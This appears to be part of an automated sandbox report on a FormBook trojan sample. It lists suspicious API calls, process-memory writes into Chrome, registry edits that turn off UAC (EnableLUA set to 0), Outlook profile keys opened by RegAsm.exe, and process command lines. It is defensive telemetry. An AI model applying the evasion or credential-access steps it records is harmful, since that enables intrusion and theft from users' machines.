Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1620 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 1096 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 4408 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 4408 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 748 wrote to memory of 2720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\Desktop\a\ld.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9ff97ab58,0x7ff9ff97ab68,0x7ff9ff97ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4340 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4768 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

